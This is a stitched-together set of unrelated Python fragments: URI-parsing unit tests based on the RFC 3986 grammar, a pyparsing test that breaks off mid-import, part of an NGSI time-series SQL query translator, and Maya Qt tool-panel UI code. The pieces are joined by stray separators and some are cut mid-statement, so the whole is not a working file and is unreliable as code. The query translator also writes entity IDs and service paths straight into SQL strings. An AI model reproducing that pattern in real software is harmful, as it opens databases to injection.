        # children: [UserInfo, Host, Port], each defaulting to an empty leaf.
        def __init__(self, userinfo, host, port):
            if userinfo is None:
                userinfo = ParseUriTest.UserInfo(None)
            if host is None:
                host = ParseUriTest.Host(None)
            if port is None:
                port = ParseUriTest.Port(None)
            super().__init__(userinfo, host, port)
    class HierPart(CompositeNode):
        # children: [Authority, Path].
        def __init__(self, authority, path):
            if authority is None:
                authority = ParseUriTest.Authority(None, None, None)
            if path is None:
                path = ParseUriTest.Path(None)
            super().__init__(authority, path)
    class Uri(CompositeNode):
        # children: [Scheme, HierPart, Query, Fragment].
        def __init__(self, scheme, hier_part, query, fragment):
            if scheme is None:
                scheme = ParseUriTest.Scheme(None)
            if hier_part is None:
                hier_part = ParseUriTest.HierPart(None, None)
            if query is None:
                query = ParseUriTest.Query(None)
            if fragment is None:
                fragment = ParseUriTest.Fragment(None)
            super().__init__(scheme, hier_part, query, fragment)
    # NOTE(review): the three helpers below are unused and, as written,
    # would raise NameError if called (class-body names such as Query are
    # not in scope inside methods). Left untouched pending removal.
    def create_query(v):
        return Query(v)
    def create_fragment(v):
        return Fragment(v)
    def create_path(v):
        return Path(v)
    def setUp(self):
        # See Appendix A in https://tools.ietf.org/html/rfc3986.
        sub_delims = One.where(lambda c: c in "!$&'()*+,;=")
        gen_delims = One.where(lambda c: c in ':/?#[]@')
        reserved = gen_delims | sub_delims
        unreserved = Alpha | Digit | '-' | '.' | '_' | '~'
        pct_encoded = '%' + HexDigit + HexDigit
        pchar = unreserved | pct_encoded | sub_delims | ':' | '@'
        query = (pchar | '/' | '?').repeat().value(self.Query)
        fragment = (pchar | '/' | '?').repeat().value(self.Fragment)
        segment = pchar.repeat()
        segment_nz = pchar.repeat(1)
        segment_nz_nc = (unreserved | pct_encoded | sub_delims | '@').repeat(1)
        path_empty = Empty
        path_rootless = (segment_nz + ('/' + segment).repeat())
        path_noscheme = (segment_nz_nc + ('/' + segment).repeat())
        path_absolute = ('/' + ((segment_nz + ('/' + segment).repeat()) |
                                Empty))
        path_abempty = ('/' + segment).repeat()
        path = (path_abempty | path_absolute | path_noscheme | path_rootless
                | path_empty)
        reg_name = (unreserved | pct_encoded | sub_delims).repeat()
        # dec-octet: 0-255 without leading-zero ambiguity.
        dec_octet = (Digit |
                     (One.where(lambda c: '1' <= c <= '9') + Digit) |
                     ('1' + Digit + Digit) |
                     ('2' + One.where(lambda c: '0' <= c <= '4') + Digit) |
                     ('25' + One.where(lambda c: '0' <= c <= '5')))
        ipv4address = (dec_octet + '.' + dec_octet + '.'
                       + dec_octet + '.' + dec_octet)
        h16 = HexDigit.repeat(lower=1, upper=4)
        ls32 = (h16 + ':' + h16) | ipv4address
        h16c = h16 + ':'
        # The nine alternatives of the RFC 3986 IPv6address rule.
        ipv6address = (
            (h16c.repeat(6, 6) + ls32) |
            ('::' + h16c.repeat(5, 5) + ls32) |
            (h16.repeat(0, 1) + '::' + h16c.repeat(4, 4) + ls32) |
            ((h16c.repeat(0, 1) + h16).repeat(0, 1) + '::' +
                h16c.repeat(3, 3) + ls32) |
            ((h16c.repeat(0, 2, take_all=True) + h16).repeat(0, 1) + '::' +
                h16c.repeat(2, 2) + ls32) |
            ((h16c.repeat(0, 3, take_all=True) + h16).repeat(0, 1) + '::' +
                h16c + ls32) |
            ((h16c.repeat(0, 4, take_all=True) + h16).repeat(0, 1) + '::' +
                ls32) |
            ((h16c.repeat(0, 5, take_all=True) + h16).repeat(0, 1) + '::' +
                h16) |
            ((h16c.repeat(0, 6, take_all=True) + h16).repeat(0, 1) + '::')
        )
        ipvfuture = ('v' + HexDigit + '.' +
                     (unreserved | sub_delims | ':').repeat(lower=1))
        ip_literal = '[' + (ipv6address | ipvfuture) + ']'
        port = Digit.repeat().value(self.Port)
        port_or_empty = Terminal(':').then(port) | Empty.value(None)
        host = (ip_literal | ipv4address | reg_name).value(self.Host)
        userinfo = (unreserved | pct_encoded | sub_delims | ':').repeat().value(
            self.UserInfo)
        userinfo_or_empty = userinfo.skip('@') | Empty.value(None)
        authority = userinfo_or_empty.then(host, lambda u, h: (u, h)).then(
            port_or_empty, lambda uh, p: self.Authority(uh[0], uh[1], p))
        scheme = (Alpha + (Alpha | Digit | '+' | '-' | '.').repeat()).value(
            self.Scheme)
        relative_part = (
            Terminal('//').then(authority).then(path_abempty,
                lambda a, p: self.HierPart(a, self.Path(p))) |
            path_absolute.value(
                lambda v: self.HierPart(None, self.Path(v))) |
            path_noscheme.value(
                lambda v: self.HierPart(None, self.Path(v))) |
            path_empty.value(
                lambda v: self.HierPart(None, self.Path(v)))
        )
        query_or_empty = Terminal('?').then(query) | Empty.value(None)
        fragment_or_empty = Terminal('#').then(fragment) | Empty.value(None)
        relative_ref = \
            relative_part.then(query_or_empty, lambda h, q: (h, q)).then(
                fragment_or_empty, lambda hq, f: self.Uri(
                    None, hq[0], hq[1], f))
        hier_part = (
            Terminal('//').then(authority).then(path_abempty,
                lambda a, p: self.HierPart(a, self.Path(p))) |
            path_absolute.value(
                lambda v: self.HierPart(None, self.Path(v))) |
            path_rootless.value(
                lambda v: self.HierPart(None, self.Path(v))) |
            path_empty.value(
                lambda v: self.HierPart(None, self.Path(v)))
        )
        uri = scheme.skip(':').then(hier_part, lambda s, h: (s, h)).then(
            query_or_empty, lambda sh, q: (sh[0], sh[1], q)).then(
            fragment_or_empty, lambda shq, f: self.Uri(
                shq[0], shq[1], shq[2], f))
        absolute_uri = scheme + ':' + hier_part + (('?' + query) | Empty)
        uri_reference = uri | relative_ref
        self.parser = uri_reference
        self.url = 'http://www.ics.uci.edu/pub/ietf/uri/?query#fragment'
        return self.parser
    def test_parse_relative(self):
        # Fix: was ``self.url.lstrip('http://')`` — str.lstrip strips a
        # character *set*, not a prefix; slicing removes exactly 'http://'.
        prs = self.parser(self.url[len('http://'):])
        self.assertEqual(len(prs), 1)
        pr = next(iter(prs))
        self.assertEqual(pr.remain, '')
        r = pr.value
        self.assertEqual(r.children[0].value, None)
        self.assertEqual(r.children[1][0][1].value, None)
        self.assertEqual(r.children[1][1].value,
                         'www.ics.uci.edu/pub/ietf/uri/')
        self.assertEqual(r.children[2].value, 'query')
        self.assertEqual(r.children[3].value, 'fragment')
    def test_parse_no_scheme(self):
        # Fix: prefix removal by slicing instead of lstrip (see above).
        prs = self.parser(self.url[len('http:'):])
        self.assertEqual(len(prs), 1)
        pr = next(iter(prs))
        self.assertEqual(pr.remain, '')
        r = pr.value
        self.assertEqual(r.children[0].value, None)
        self.assertEqual(r.children[1][0][1].value, 'www.ics.uci.edu')
        self.assertEqual(r.children[1][1].value, '/pub/ietf/uri/')
        self.assertEqual(r.children[2].value, 'query')
        self.assertEqual(r.children[3].value, 'fragment')
    def test_parse_uri(self):
        prs = self.parser(self.url)
        self.assertEqual(len(prs), 1)
        pr = next(iter(prs))
        self.assertEqual(pr.remain, '')
        r = pr.value
        self.assertEqual(r.children[0].value, 'http')
        self.assertEqual(r.children[1][0][1].value, 'www.ics.uci.edu')
        self.assertEqual(r.children[1][1].value, '/pub/ietf/uri/')
        self.assertEqual(r.children[2].value, 'query')
        self.assertEqual(r.children[3].value, 'fragment')
    def test_urlparse(self):
        r = urlparse(self.url)
        self.assertEqual(r.scheme, 'http')
        self.assertEqual(r.netloc, 'www.ics.uci.edu')
        self.assertEqual(r.path, '/pub/ietf/uri/')
        self.assertEqual(r.query, 'query')
        self.assertEqual(r.fragment, 'fragment')
    def test_ipv6_okay(self):
        url = 'https://[2001:db8:85a3::8a2e:370:7334]:443/'
        prs = self.parser(url)
        self.assertEqual(len(prs), 1)
        pr = next(iter(prs))
        self.assertEqual(pr.remain, '')
        r = pr.value
        self.assertEqual(r.children[0].value, 'https')
        # Bug fix: the expected host did not match the URL under test
        # (stale address left over from an edit), so this assertion
        # could never pass.
        self.assertEqual(
            r.children[1][0][1].value, '[2001:db8:85a3::8a2e:370:7334]')
        self.assertEqual(r.children[1][0][2].value, '443')
        self.assertEqual(r.children[1][1].value, '/')
        self.assertEqual(r.children[2].value, None)
        self.assertEqual(r.children[3].value, None)
    def test_ipv6_invalid(self):
        url = 'https://[ghi::]:443/'
        r = urlparse(url)
        # urlparse *incorrectly* accepts this.
        self.assertEqual(r.netloc, '[ghi::]:443')
        prs = self.parser(url)
        self.assertEqual(len(prs), 1)
        pr = next(iter(prs))
        self.assertNotEqual(pr.remain, '')
    def test_ipfuture(self):
        url = 'https://[v8.2001:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:370:7334]:443/'
        r = urlparse(url)
        self.assertEqual(r.netloc, '[v8.2001:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:370:7334]:443')
        prs = self.parser(url)
        self.assertEqual(len(prs), 1)
        pr = next(iter(prs))
        self.assertEqual(pr.remain, '')
        r = pr.value
        self.assertEqual(r.children[0].value, 'https')
        self.assertEqual(
            r.children[1][0][1].value, '[v8.2001:fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:370:7334]')
        self.assertEqual(r.children[1][0][2].value, '443')
        self.assertEqual(r.children[1][1].value, '/')
        self.assertEqual(r.children[2].value, None)
        self.assertEqual(r.children[3].value, None)
@unittest.skipUnless('pyparsing' in sys.modules, 'Need PyParsing')
class PyParsingTest(unittest.TestCase):
def setUp(self):
self._opn = {
"+" : operator.add,
"-" : operator.sub,
"*" : operator.mul,
"/" : operator.truediv,
}
self._expr_stack = []
self._expr = '-(1+2*3+5)/(6-2)'
self._create_parser()
self._create_pyparser()
def _create_parser(self):
def xo_yo(fo1, fo2):
if not fo1:
return fo2
return fo1[1](fo1[0], fo2[0]), fo2[1]
def xo_x(fo1, fo2):
if not fo1:
return fo2
return fo1[1](fo1[0], fo2)
fnumber = Regex(
re.compile(r"[+-]?\d+(?:\.\d*)?(?:[eE][+-]?\d+)?")).value(float)
plus, minus, mult, div = map(Terminal, '+-*/')
addop = (plus | minus).value(lambda o: self._opn[o])
multop = (mult | div).value(lambda o: self._opn[o])
expr = Forward()
sub_expr = Terminal('(').then(expr).skip(')')
factor = Terminal('-').repeat(0, 1).then(
fnumber | sub_expr, lambda x, y: -y if x else y)
term = factor.then(multop, lambda f, o: (f, o)).repeat(0, None,
xo_yo).then(factor, xo_x)
expr.is_(term.then(addop, lambda f, o: (f, o)).repeat(
0, None, xo_yo).then(term, xo_x))
self.parser = expr
def _create_pyparser(self):
# Copied from
# https://github.com/pyparsing/pyparsing/blob/master/examples/fourFn.py.
from pyparsing import (Literal, Group, Forward, Regex, ZeroOrMore,
Suppress)
def | |
where = " where table_name !~* '\"{}{}\"[.].*'"
stmt += where.format(TENANT_PREFIX, '.*')
try:
table_names = self._execute_query_via_cache(key,
"tableNames",
stmt,
[],
self.default_ttl)
except Exception as e:
self.sql_error_handler(e)
self.logger.error(str(e), exc_info=True)
return []
return [r[0] for r in table_names]
def _get_select_clause(self, attr_names, aggr_method, aggr_period):
if not attr_names:
return '*'
attrs = ['entity_type', 'entity_id']
if aggr_method:
if aggr_period:
attrs.append(
"DATE_TRUNC('{}',{}) as {}".format(
aggr_period, self.TIME_INDEX_NAME,
self.TIME_INDEX_NAME)
)
# TODO: https://github.com/orchestracities/ngsi-timeseries-api/issues/106
m = '{}("{}") as "{}"'
attrs.extend(m.format(aggr_method, a, a) for a in set(attr_names))
else:
attrs.append(self.TIME_INDEX_NAME)
attrs.extend('"{}"'.format(a) for a in attr_names)
select = ','.join(attrs)
return select
def _get_limit(self, limit, last_n):
# https://crate.io/docs/crate/reference/en/latest/general/dql/selects.html#limits
default_limit = self.config.default_limit()
if limit is None or limit > default_limit:
limit = default_limit
if last_n is None:
last_n = limit
if limit < 1:
raise InvalidParameterValue(
f"limit should be >=1 and <= {default_limit}.")
if last_n < 1:
raise InvalidParameterValue(
f"last_n should be >=1 and <= {default_limit}.")
return min(last_n, limit)
def _get_where_clause(self, entity_ids, from_date, to_date, fiware_sp=None,
geo_query=None):
clauses = []
where_clause = ""
if entity_ids:
ids = ",".join("'{}'".format(e) for e in entity_ids)
clauses.append(" entity_id in ({}) ".format(ids))
if from_date:
clauses.append(" {} >= '{}'".format(self.TIME_INDEX_NAME,
self._parse_date(from_date)))
if to_date:
clauses.append(" {} <= '{}'".format(self.TIME_INDEX_NAME,
self._parse_date(to_date)))
if fiware_sp:
# Match prefix of fiware service path
if fiware_sp == '/':
clauses.append(
" " + FIWARE_SERVICEPATH + " ~* '/.*'")
else:
clauses.append(
" " + FIWARE_SERVICEPATH + " ~* '"
+ fiware_sp + "($|/.*)'")
else:
# Match prefix of fiware service path
clauses.append(" " + FIWARE_SERVICEPATH + " = ''")
geo_clause = self._get_geo_clause(geo_query)
if geo_clause:
clauses.append(geo_clause)
if len(clauses) > 0:
where_clause = "where" + " and ".join(clauses)
return where_clause
@staticmethod
def _parse_date(date):
try:
return dateutil.parser.isoparse(date.strip('\"')).isoformat()
except Exception as e:
raise InvalidParameterValue(date, "**fromDate** or **toDate**")
@staticmethod
def _is_iso_date(date):
try:
dateutil.parser.isoparse(date.strip('\"')).isoformat()
return True
except Exception as e:
return False
@staticmethod
def _parse_limit(limit):
if (not (limit is None or isinstance(limit, int))):
raise InvalidParameterValue(limit, "limit")
return limit
@staticmethod
def _parse_last_n(last_n):
if (not (last_n is None or isinstance(last_n, int))):
raise InvalidParameterValue(last_n, "last_n")
return last_n
    def _get_geo_clause(self, geo_query: SlfQuery = None) -> Optional[str]:
        """Translate an NGSI geo query into a SQL condition string.

        Abstract hook: concrete backend translators must override this.
        Presumably returns None when no geo filtering applies — the caller
        treats a falsy result as "no clause".
        """
        raise NotImplementedError
def _get_order_group_clause(self, aggr_method, aggr_period,
select_clause, last_n):
order_by = []
group_by = []
# Group By
if aggr_method and select_clause != "*":
group_by.extend(["entity_type", "entity_id"])
if aggr_period:
# Note: If alias shadows a real table column,
# grouping will NOT be applied on the aliased column
gb = "DATE_TRUNC('{}', {})".format(
aggr_period, self.TIME_INDEX_NAME)
group_by.append(gb)
# Order by
direction = "DESC" if last_n else "ASC"
if aggr_method:
if aggr_period:
# consider always ordering by entity_id also
order_by.extend(["entity_type", "entity_id"])
order_by.append(
"{} {}".format(self.TIME_INDEX_NAME, direction))
else:
order_by.append("{} {}".format(self.TIME_INDEX_NAME, direction))
clause = ""
if group_by:
clause = "GROUP BY {}".format(",".join(group_by))
if order_by:
clause += " ORDER BY {}".format(",".join(order_by))
return clause
def query(self,
attr_names=None,
entity_type=None,
entity_id=None,
entity_ids=None,
where_clause=None,
aggr_method=None,
aggr_period=None,
aggr_scope=None,
from_date=None,
to_date=None,
last_n=None,
limit=10000,
offset=0,
fiware_service=None,
fiware_servicepath=None,
geo_query: SlfQuery = None):
"""
This translator method is used by all API query endpoints.
:param attr_names:
Array of attribute names to query for.
:param entity_type:
(Optional). NGSI Entity Type to query about. Unique and optional
as long as there are no 2 equal NGSI ids for any NGSI type.
:param entity_id:
NGSI Id of the entity you ask for. Cannot be used with entity_ids.
:param entity_ids:
Array of NGSI ids to consider in the response. Cannot be used with
entity_id.
:param where_clause:
(Optional), to use a custom SQL query (not open to public API).
:param aggr_method:
(Optional), function to apply to the queried values. Must be one
of the VALID_AGGR_METHODS (e.g, sum, avg, etc). You need to specify
at least one attribute in attr_names, otherwise this will be
ignored.
:param aggr_period:
(Optional), only valid when using aggr_method. Defines the time
scope on to which the aggr_method will be applied, hence defines
also the number of values that will be returned. Must be one of the
VALID_AGGR_PERIODS (e.g, hour). I.e., querying avg per hour will
return 24 values times the number of days of available measurements
:param aggr_scope: (Not Implemented). Defaults to "entity", which means
the aggrMethod will be applied N times, once for each entityId.
"global" instead would allow cross-entity_id aggregations.
:param from_date:
(Optional), used to filter results, considering only from this date
inclusive.
:param to_date:
(Optional), used to filter results,
considering only up to this date inclusive.
:param last_n:
(Optional), used to filter results, return only the last_n elements
of what would be the result of the query once all filters where
applied.
:param limit:
(Optional), used to filter results, return up to limit elements
of what would be the result of the query once all filters where
applied.
:param offset:
(Optional), used to page results.
:param fiware_service:
(Optional), used to filter results, considering in the result only
entities in this FIWARE Service.
:param fiware_servicepath:
(Optional), used to filter results, considering in the result only
entities in this FIWARE ServicePath.
:param geo_query:
(Optional), filters results with an NGSI geo query.
:return:
The shape of the response is always something like this:
[{
'type': 'Room',
'id': 'Room1', or 'ids': ['Room1', 'Room2'],
'index': [t0, t1, ..., tn],
'attr_1': {
'index': [t0, t1, ..., tn], # index of this attr (if different)
'values': [v0, v1, ..., vn],
'type': Number
},
...,
'attr_N': ...
},...
]
It returns an array of dictionaries, each representing a query result
on a particular NGSI Entity Type. Each of the dicts in this array
consists of the following attributes.
'type' is the NGSI Entity Type of the response.
'id' or 'ids'. id if the response contains data from a specific NGSI
entity (with that id) or ids in the case the response aggregates data
from multiple entities (those with those ids). You get one or the
other, not both.
'index': The time index applying to the response, applies to all
attributes included in the response. It may not be present if each
attribute has its own time index array, in the cases where attributes
are measured at different moments in time. Note since this is a
"global" time index for the entity, it may contain some NULL values
where measurements were not available. It's an array containing time
in ISO format representation, typically in the original timezone the
Orion Notification used, or UTC if created within QL.
Each attribute in the response will be represented by a dictionary,
with an array called 'values' containing the actual historical values
of the attributes as queried. An attribute 'type' will have the
original NGSI type of the attribute (i.e, the type of each of the
elements now in the values array). The type of an attribute is not
expected to change in time, that'd be an error. Additionally, it may
contain an array called 'index', just like the global index
discussed above but for this specific attribute. Thus, this 'index'
will never contain NONE values.
If the user did not specify an aggrMethod, the response will not mix
measurements of different entities in the same values array. So in this
case, there will be many dictionaries in the response array, one for
each NGSI Entity.
When using aggrPeriod, the index array is a completely new index,
composed of time steps of the original index of the attribute but
zeroing the less significant bits of time. For example, if there were
measurements in time 2018-04-03T08:15:15 and 2018-04-03T09:01:15, with
aggrPeriod = minute the new index will contain, at least, the steps
2018-04-03T08:15:00 and 2018-04-03T09:01:00 respectively.
:raises:
ValueError in case of misuse of the attributes.
UnsupportedOption for still-to-be-implemented features.
crate.DatabaseError in case of errors with CrateDB interaction.
"""
last_n = self._parse_last_n(last_n)
limit = self._parse_limit(limit)
if last_n == 0 or limit == 0:
return []
if entity_id and entity_ids:
raise NGSIUsageError("Cannot use both entity_id and entity_ids "
"params in the same call.")
if aggr_method and aggr_method.lower() not in VALID_AGGR_METHODS:
raise UnsupportedOption("aggr_method={}".format(aggr_method))
if aggr_period and aggr_period.lower() not in VALID_AGGR_PERIODS:
raise UnsupportedOption("aggr_period={}".format(aggr_period))
# TODO check also entity_id and entity_type to not | |
,2)
tip = lang.Lang(en=u'Deformer filter / Deformation object\nLeft click >> Single selection\nShift + Left click >> Multiple selection / release\nRight click >> Select all',
ja=u'選択フィルター / デフォメーション オブジェクト\n左クリック→単独選択\nシフト+左クリック→複数選択/解除\n右クリック→全選択').output()
self.select_deform_but = make_flat_button(icon=':/pickDeformerObj.png', name='', text=text_col, bg=hilite, w_max=filter_w, h_max=filter_h, tip=tip)
self.select_deform_but.clicked.connect(lambda : self.select_filter_mode(mode=4))
self.select_deform_but.rightClicked.connect(lambda : self.select_filter_mode(mode=-1))
self.main_layout.addWidget(self.select_deform_but, vn, 8, 1 ,2)
tip = lang.Lang(en=u'Deformer filter / Other object\nLeft click >> Single selection\nShift + Left click >> Multiple selection / release\nRight click >> Select all',
ja=u'選択フィルター / その他のオブジェクト\n左クリック→単独選択\nシフト+左クリック→複数選択/解除\n右クリック→全選択').output()
self.select_other_but = make_flat_button(icon=':/pickOtherObj.png', name='', text=text_col, bg=hilite, w_max=filter_w, h_max=filter_h, tip=tip)
self.select_other_but.clicked.connect(lambda : self.select_filter_mode(mode=5))
self.select_other_but.rightClicked.connect(lambda : self.select_filter_mode(mode=-1))
self.main_layout.addWidget(self.select_other_but, vn, 10, 1 ,1)
'''
self.filter_group = QButtonGroup(self)#ボタンをまとめる変数を定義
self.filter_group.addButton(self.select_all_but, 0)
self.filter_group.addButton(self.select_Marker_but, 1)
self.filter_group.addButton(self.select_joint_but, 2)
self.filter_group.addButton(self.select_surface_but, 3)
self.filter_group.addButton(self.select_curve_but, 4)
self.filter_group.addButton(self.select_deform_but, 5)
self.filter_group.button(0).setChecked(True)
self.filter_group.buttonClicked.connect(lambda : self.select_filter_mode(mode=self.filter_group .checkedId()))
self.select_filter_mode(mode=self.filter_group .checkedId())#フィルターを初期化しておく
'''
vn+=1
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#選択入力ラインエディット--------------------------------------------------------------------------------
#フィルターセットしているときにウインドウ触るとフォーカスとって暴発することがあるのを防ぐためのダミーライン
self.dummy_line = self.make_line_edit(text=string_col, bg=bg_col)
self.dummy_line.setVisible(False)
self.main_layout.addWidget(self.dummy_line, vn, 0, 1, 11)
vn+=1
self.selection_line = self.make_line_edit(text=string_col, bg=bg_col)
self.main_layout.addWidget(self.selection_line, vn, 0, 1, 11)
self.selection_line.textChanged.connect(self.keep_pre_search_line)
self.selection_line.editingFinished.connect(self.search_node)
vn+=1
#厳密に位置調整
ud_w = 39
ud_h = 6
lr_w = 13
lr_h = 16
lr_min = 18
self.index_line = self.make_line_edit(text=string_col, bg=bg_col)
self.index_line.editingFinished.connect(self.search_component)
self.main_layout.addWidget(self.index_line, vn, 0, 2, 8)
self.pick_up = make_flat_button(icon=':/arrowUp', name='', text=text_col, bg=ui_color, checkable=False, w_max=ud_w, h_max=ud_h ,h_min=None)
self.pick_up.clicked.connect(lambda : self.pick_walk(mode='up'))
self.main_layout.addWidget(self.pick_up, vn, 8, 1, 3)
self.pick_down = make_flat_button(icon=':/arrowDown', name='', text=text_col, bg=ui_color, checkable=False, w_max=ud_w, h_max=ud_h ,h_min=None)
self.pick_down.clicked.connect(lambda : self.pick_walk(mode='down'))
self.main_layout.addWidget(self.pick_down, vn+1, 8, 1, 3)
self.pick_left = make_flat_button(icon=':/arrowLeft', name='', text=text_col, bg=ui_color, checkable=False, w_max=lr_w, h_max=lr_h ,h_min=lr_min)
self.pick_left.clicked.connect(lambda : self.pick_walk(mode='left'))
self.main_layout.addWidget(self.pick_left, vn, 8, 2, 1)
self.pick_right = make_flat_button(icon=':/arrowRight', name='', text=text_col, bg=ui_color, checkable=False, w_max=lr_w, h_max=lr_h ,h_min=lr_min)
self.pick_right.clicked.connect(lambda : self.pick_walk(mode='right'))
self.main_layout.addWidget(self.pick_right, vn, 10, 2, 1)
vn+=2
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#検索タイプフィルタリング
vh = 0
hw = 2
fw = 23
fh =18
self.all_filter = make_flat_button(name='All', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from all node types')
self.all_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.all_filter.text()))
self.all_filter.setChecked(True)
self.main_layout.addWidget(self.all_filter, vn, vh, 1, hw)
vh += hw
self.transform_filter = make_flat_button(name='Trs', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Transform node')
self.transform_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.transform_filter.text()))
self.main_layout.addWidget(self.transform_filter, vn, vh, 1, hw)
vh += hw
self.joint_filter = make_flat_button(name='Jot', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Joint')
self.joint_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.joint_filter.text()))
self.main_layout.addWidget(self.joint_filter, vn, vh, 1, hw)
vh += hw
self.shape_filter = make_flat_button(name='Sap', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Shape node')
self.shape_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.shape_filter.text()))
self.main_layout.addWidget(self.shape_filter, vn, vh, 1, hw)
vh += hw
self.dummy_but_a = make_flat_button(name='Nan', text=mute_text, bg=hilite, checkable=False, w_max=fw, h_max=fh, tip='Future filters will be added')
self.main_layout.addWidget(self.dummy_but_a , vn, vh, 1, hw)
vh += hw
self.dummy_but_b = make_flat_button(name='Nan', text=mute_text, bg=hilite, checkable=False, w_max=fw, h_max=fh, tip='Future filters will be added')
self.main_layout.addWidget(self.dummy_but_b , vn, vh, 1, hw)
vh += hw
vn+=1
vh = 0#ボタンの開始地点
self.parent_cons_filter = make_flat_button(name='Pac', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Parent Constraint')
self.parent_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.parent_cons_filter.text()))
self.main_layout.addWidget(self.parent_cons_filter, vn, vh, 1, hw)
vh += hw
self.point_cons_filter = make_flat_button(name='Poc', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Point Constraint')
self.point_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.point_cons_filter.text()))
self.main_layout.addWidget(self.point_cons_filter, vn, vh, 1, hw)
vh += hw
self.orient_cons_filter = make_flat_button(name='Orc', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Orient Constraint')
self.orient_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.orient_cons_filter.text()))
self.main_layout.addWidget(self.orient_cons_filter, vn, vh, 1, hw)
vh += hw
self.scale_cons_filter = make_flat_button(name='Slc', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Scale Constraint')
self.scale_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.scale_cons_filter.text()))
self.main_layout.addWidget(self.scale_cons_filter, vn, vh, 1, hw)
vh += hw
self.aim_cons_filter = make_flat_button(name='Aic', text=text_col, bg=hilite, checkable=True, w_max=fw, h_max=fh, tip='Search from Aim Constraint')
self.aim_cons_filter.clicked.connect(lambda : self.set_filter_but(filter_type=self.aim_cons_filter.text()))
self.main_layout.addWidget(self.aim_cons_filter, vn, vh, 1, hw)
vh += hw
self.select_line_c = make_h_line()
self.dummy_but_c = make_flat_button(name='Nan', text=mute_text, bg=hilite, checkable=False, w_max=fw, h_max=fh, tip='Future filters will be added')
self.main_layout.addWidget(self.dummy_but_c , vn, vh, 1, 1)
vh += hw
vn+=1
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#self.main_layout.addWidget(self.select_line_c, vn, 0, 1 ,11)
#vn+=1
#一括操作ようにリストにしておく
self.all_select_but_list = [select_but, select_group_but, center_mode_but]
self.all_filter_but_list = [self.select_Marker_but, self.select_joint_but,
self.select_curve_but, self.select_surface_but,
self.select_deform_but, self.select_other_but]
self.all_search_widgets = [self.selection_line, self.index_line, self.pick_down, self.pick_left, self.pick_up, self.pick_right]
self.filter_but_list = [self.all_filter, self.transform_filter,
self.joint_filter,self.shape_filter,
self.dummy_but_a, self.dummy_but_b,
self.parent_cons_filter, self.point_cons_filter,
self.orient_cons_filter, self.scale_cons_filter,
self.aim_cons_filter, self.dummy_but_c]
self.select_lines = [self.select_line_a]
#self.select_line_b,
#self.select_line_c]
for but in self.filter_but_list:
but.rightClicked.connect(lambda : self.pop_option_window(mode='filter'))
self.select_section_but = self.all_select_but_list+self.all_filter_but_list+self.all_search_widgets+self.filter_but_list+self.select_lines
#高さを保存
self.select_section_height = [but.height() for but in self.select_section_but]
self.select_top.rightClicked.connect(lambda : self.toggle_ui(buttons=self.select_section_but, heights=self.select_section_height))
#--------------------------------------------------------------------------------
#トランスフォームエリア
#action.triggered.connect()
self.transform_top = make_flat_button(name=u'▽ Transform ', checkable=False, flat=False, text=text_col, h_min=top_h, bg=mid_color, hover=top_hover)
self.transform_top.clicked.connect(lambda : self.pop_top_menus(but=self.transform_top, menu_func=self.create_trans_menu))
#qt.change_button_color(self.transform_top, textColor=text_col, bgColor=mid_color)
#検索、セレクション表示窓--------------------------------------------------------------------------------
self.main_layout.addWidget(self.transform_top, vn, 0, 1 ,11)
vn+=1
self.main_layout.addWidget(self.make_ds_line(), vn, 0, 1 ,11)
vn+=1
#--------------------------------------------------------------------------------
#スケール
global scale_x
global scale_y
global scale_z
global select_scale
global key_scale_x
global key_scale_y
global key_scale_z
line_min_size = 55
wheel_max_size = 26
axis_size = (24, 20)#xyzアイコンの大きさ
axis_w = 24#軸ボタンの幅
axis_h = 20#軸ボタンの高さ
sel_w = 22#SRT選択ボタンの幅
sel_h = 22#SRT選択ボタンの幅
anim_b = 2#ボタンの幅
text_b = 6#ラインの幅
axis_b = 2#軸ボタンの幅
sel_b = 1#選択ボタンの幅
key_but_tip = lang.Lang(en=u'Set / release animation key\nLeft Click >> Single axis setting\nRight Click >> All axis setting',
ja=u'アニメーションキーを設定/解除\n左クリック→単独軸設定\n右クリック→全軸一括設定')
lock_but_tip = lang.Lang(en=u'Lock / Unlock Attribute\nLeft Click >> Lock / Unlock All Axis\nRight Click >> Show Axis Lock Menu',
ja=u'アトリビュートをロック/解除\n左クリック→全軸一括ロック/ロック解除\n右クリック→各軸ロックメニュー表示')
#--------------------------------------------------------------------------------
tw = 0#配置場所
key_scale_x = make_flat_button(icon=image_path+'Key_N.png', name = '',
text=text_col, bg=hilite, checkable=False, w_max=24, tip=key_but_tip.output())
key_scale_x.clicked.connect(lambda : set_key_frame(mode=0, axis=0))
key_scale_x.rightClicked.connect(qt.Callback(lambda : set_key_frame(mode=0, axis=3)))
self.main_layout.addWidget(key_scale_x, vn, tw, 1, anim_b)
tw += anim_b
scale_x = self.make_line_edit(text=string_col, bg=bg_col)
scale_x.setMinimumWidth(line_min_size)
scale_x.editingFinished.connect(qt.Callback(lambda : self.check_multi_selection(text=scale_x.text(), current=(0, 0))))
scale_x.textChanged.connect(lambda : self.keep_pre_line_text(text=scale_x.text(), current=(0, 0)))#入力変更が成されたかどうかを判定するように即時保存を実行
scale_x.editingFinished.connect(qt.Callback(lambda : self.scaling(text=scale_x.text(), axis=0)))
